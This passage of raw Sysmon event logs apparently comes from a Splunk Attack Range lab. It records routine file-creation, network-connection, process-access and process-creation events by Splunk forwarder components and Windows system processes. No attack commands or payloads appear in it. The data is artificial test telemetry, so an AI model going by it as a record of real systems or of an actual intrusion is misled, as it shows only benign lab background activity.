Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE05505594CF09E6BEBC3B164A090977,SHA256=73FF42B7F2EE2AA74733BB97B749FF1439BED77BAC0D6F2008FFB7285134C5F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:10.479{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=013F7C84338CA06DB45DC55686EA2877,SHA256=5A6DF8F07E749530098B76B412DC46A2619B3A5454FAE30AD6B7C8ABC73B08F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:11.843{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=987B6A069C78DDB44DD9B4A5AA2413FF,SHA256=B071B1A12EEB8E5B9BA8340ED01D54C61261AAA30FF69404F5B9B7FABDE193AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:11.510{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A7B0F7130C46B7E20BB39E46FCD17B7,SHA256=D12F86B08AFC5212C9EBC806A49F203B26AF22BCE0F389403EFAFDDF2D4FA2B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:12.859{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B792CF29EB7B13EA0EB5D877D76FD267,SHA256=B78DCE72DBB288D439EFAB09F43A8BC936D84611DE517C44A85E93EC9643E6D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:10.580{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:12.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8797A9E2DC2C63B54477A92C9EE2C9B6,SHA256=CB6CC6F13644723D669007E95F64679C65CAE51DA4FE6EB529F2C8E2B790C072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:13.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00059F55E810DF4E414A27B0B48EC02D,SHA256=03E7A7B0FB1CBB7D8FF661BC9BF345BB7137D33ABF99E8534770F6CD7D885F07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:13.588{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6102EDF82F465841D9D9129E575A9A,SHA256=B37A9034A283027935A13235D149814C11F3351558AFFC958DB198423582666D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:10.580{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51191-false10.0.1.12-8000- 23542300x8000000000000000214475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:14.906{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=722EF0332F0F62238E19CB498D266AAA,SHA256=81FD8ACD64450753AFAF77263642E2E203404C82CA4EAF31B219DC06D43789F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:14.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFAA5AF4698F2665C17DEC097934202,SHA256=1B4FD29C3064FF88101210AEF81301E5CDDAA72049D86ECCD6751B86BED4D80E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:15.635{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662CEFBA606C201F4AB1111636BE4CB7,SHA256=EF541D5296A74582C98B8F13BEF58B0CC639B5DC61EFB57DE04D69141931609A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:16.651{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFD506C486E985F4491BCF7CAC056F04,SHA256=34AECA3572073AF4638CAEC7198C9A83181160E2DDDFC67ACB21A1842B3C32FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:16.109{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D37C241D140977343F4ABCCC9505296,SHA256=A34C02574C59EFF7D87DF1EBBDD9F95430E206766FF828C9A8222DA4F45B65DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:17.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E067DCE9AF75EB696797B88FCB764E6A,SHA256=5CFC04E649E758056000D25D8EE69706D73BE0F948B7C829B36DC27276104DD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:15.675{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51192-false10.0.1.12-8000- 23542300x8000000000000000214477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:17.156{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F03AC8F8F24E88996BB979BB24E94660,SHA256=E1B70AD97E8BFA9741DB4CEDB76CBEDDF18AE3D119611116349AE6332901BE95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:18.760{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60BCCDCD6C88D7B0426CAF6CD173560,SHA256=81EC27277BB7A9D5A5D2AEB1164A9D641B9EBC71D871C42C8FFA59641E1278A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:18.390{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AF64D08F34E37D1D75D552075F24931,SHA256=DA376D026818DEC233216350872EE4AA1CAC3C22BD572ABBCA4339791AEFB160,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:15.643{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53247-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000285338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E9B-6216-B004-000000003802}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.994{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E9B-6216-B004-000000003802}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.995{C8EA50B7-0E9B-6216-B004-000000003802}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.885{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D484FE5C414DEA0E394D38D08963D5FA,SHA256=4413D767D93333F53D5E84DED8E782E12C0387CFBDA185684E85CB50206F83E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:19.593{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0E285F2854307E0DD4975CF39521FB,SHA256=53783CCA510FD60ED1B2C06DDC1A0D69027A910C84089C8501944F5382C58EAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.713{C8EA50B7-0E9B-6216-AF04-000000003802}56801912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E9B-6216-AF04-000000003802}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E9B-6216-AF04-000000003802}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:19.479{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E9B-6216-AF04-000000003802}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 